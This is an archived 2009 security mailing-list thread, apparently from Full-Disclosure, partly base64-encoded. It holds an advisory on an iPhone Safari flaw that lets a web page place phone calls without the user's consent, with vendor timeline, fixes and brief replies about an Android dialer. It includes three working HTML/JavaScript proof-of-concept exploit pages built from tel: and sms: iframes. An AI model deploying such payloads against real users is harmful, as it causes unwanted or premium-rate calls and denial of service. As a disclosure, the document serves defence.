ciA8Y29sbGluQGJldGF2ZXJzaW9uLm5ldD4NCj5pbmZvL3BncDogZmluZ2VyIGNvbGxpbkBiZXRh
dmVyc2lvbi5uZXQNCj5DIGdpdmVzIHlvdSBlbm91Z2ggcm9wZSB0byBoYW5nIHlvdXJzZWxmLiBD
KysgYWxzbyBnaXZlcyB5b3UgdGhlIHRyZWUgDQo+b2JqZWN0IHRvIHRpZSBpdCB0by4NCg==

------OOQ6QVNMQ89GSPKM03TM81BMDDCI85--



From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 09:14
------OOQR8OIVASFMLRMIKQ9G04MAIHM98G
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

Q29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmluZyBPUyB2ZXJzaW9u
IDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24gZW1haWwgdG8gZGlh
bCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQgdGhlIHN1YmplY3Qg
bGluZSA7KQoKRldJVywgaXQgZGlkbid0IGFjdHVhbGx5IGRpYWwsIGp1c3QgbG9hZGVkIHRoZSBk
aWFsZXIgd2l0aCB0aGF0IG51bWJlciByZWFkeS4gIAoKTG9va3MgbGlrZSB0aGlzIGlzIGEgV2Vi
a2l0IGJ1Zywgbm90IFNhZmFyaS4gCgpDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lv
bi5uZXQ+IHdyb3RlOgoKPlJlbGVhc2VkIHNpbmNlIEFwcGxlIHB1Ymxpc2hlZCB0aGUgaVBob25l
IDMuMCBzZWN1cml0eSBmaXhlcy4NCj4NCj5WdWxuZXJhYmlsaXR5IFJlcG9ydA0KPg0KPi0tLSBC
RUdJTiBBRFZJU09SWSAtLS0NCj4NCj5NYW51ZmFjdHVyZXI6IEFwcGxlICh3d3cuYXBwbGUuY29t
KQ0KPkRldmljZTogICAgICAgaVBob25lIDNHIChpUGhvbmUgMXN0IEdlbikNCj5GaXJtd2FyZTog
ICAgIDIuMSAocG9zc2libGUgZWFybGllciB2ZXJzaW9ucykNCj5EZXZpY2UgVHlwZTogIHNtYXJ0
IHBob25lDQo+DQo+U3Vic3lzdGVtczogU2FmYXJpIChhbmQgbW9iaWxlIHRlbGVwaG9ueSkNCj4N
Cj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlNob3J0IG5hbWU6DQo+ICAgaVBo
b25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgKHZ1bG5lcmFiaWxpdHkpDQo+DQo+VnVsbmVyYWJp
bGl0eSBjbGFzczoNCj4gICBhcHBsaWNhdGlvbiBsb2dpYyBidWcNCj4NCj5FeGVjdXRpdmUgU3Vt
bWFyeToNCj4gICBBIG1hbGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwg
d2l0aG91dCB0aGUgbmVlZCBvZiB1c2VyDQo+ICAgaW50ZXJhY3Rpb24uIFRoZSBkZXN0aW5hdGlv
biBwaG9uZSBudW1iZXIgaXMgY2hvc2VuIGJ5IHRoZSBhdHRhY2tlci4NCj4NCj5SaXNrOiBNRURJ
VU0tSElHSA0KPiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBv
ZiBmaW5hbmNpYWwgZ2FpbiB0aHJvdWdoDQo+ICAgdGhpcyBhdHRhY2sgYnkgY2FsbGluZyBvZiBw
cmVtaXVtIHJhdGUgbnVtYmVycyAoZS5nLiAxLTkwMCBpbiB0aGUNCj4gICBVLlMuKS4gRGVuaWFs
LW9mLXNlcnZpY2UgYWdhaW5zdCBhcmJpdHJhcnkgcGhvbmUgbnVtYmVycyB0aHJvdWdoDQo+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4NCj4tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlJlcG9ydGVyOiBDb2xsaW4gTXVsbGluZXIgPGNvbGxp
bltBVF1tdWxsaW5lci5vcmc+DQo+DQo+LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4N
Cj5BZmZpbGlhdGlvbjogTVVsbGlORVIuT1JHIC8gdGhlIHRyaWZpbml0ZSBncm91cCAvIChGcmF1
bmhvZmVyIFNJVCkNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPg0KPlRpbWUg
bGluZToNCj4NCj4gICBPY3QuIDIwLiAyMDA4OiBSZXBvcnRlZCB2dWxuZXJhYmlsaXR5IHRvIHZl
bmRvci4NCj4gICBPY3QuIDIwLiAyMDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBv
dXIgZW1haWwuDQo+ICAgICAgICAgICAgICAgICAgTm90IGNvbW1lbnRpbmcgb24gdGhlIHZ1bG5l
cmFiaWxpdHkgaXRzZWxmLg0KPiAgIE9jdC4gMjcuIDIwMDg6IFNlbnQgdXBkYXRlIHRvIHZlbmRv
ciwgYWxzbyByZXF1ZXN0aW5nIGEgc3RhdHVzIHJlcG9ydC4NCj4gICBPY3QuIDI5LiAyMDA4OiBS
ZXBseSBmcm9tIHZlbmRvciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPiAgIE9j
dC4gMzAuIDIwMDg6IFNlbnQgYWRkaXRpb25hbCBpbmZvcm1hdGlvbi4NCj4gICBOb3YuIDEzLiAy
MDA4OiBWZW5kZXIgc2F5cyB2dWxuZXJhYmlsaXR5IGlzIGZpeGVkIGluIHVwY29taW5nIE9TDQo+
ICAgICAgICAgICAgICAgICAgdmVyc2lvbi4NCj4gICBOb3YuIDIwLiAyMDA4OiBQdWJsaWMgZGlz
Y2xvc3VyZS4NCj4gICBKdW4uIDE4LiAyMDA5OiBGdWxsLURpc2Nsb3N1cmUuDQo+DQo+LS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5GaXg6DQo+DQo+ICAgaVBob25lIE9TIDIuMg0K
PiAgIGlQaG9uZSBPUyAyLjIuMQ0KPiAgIGlQaG9uZSBPUyAzLjANCj4JDQo+LS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0NCj4NCj5UZWNobmljYWwgRGV0YWlsczoNCj4NCj4gICBUaGUgU2Fm
YXJpIHZlcnNpb24gcnVubmluZyBvbiB0aGUgaVBob25lIHN1cHBvcnRzIGhhbmRsaW5nIHRoZSBU
RUwgWzFdDQo+ICAgcHJvdG9jb2wgdGhyb3VnaCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFs
ZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4gICBkb25lIGJ5IHBhc3NpbmcgdGhlIHByb3ZpZGVk
IHBob25lIG51bWJlciB0byB0aGUgdGVsZXBob255DQo+ICAgYXBwbGljYXRpb24uIFVuZGVyIG5v
cm1hbCBjb25kaXRpb25zLCBsb2FkaW5nIGEgdGVsOiBVUkkgcmVzdWx0cyBpbiBhDQo+ICAgbWVz
c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
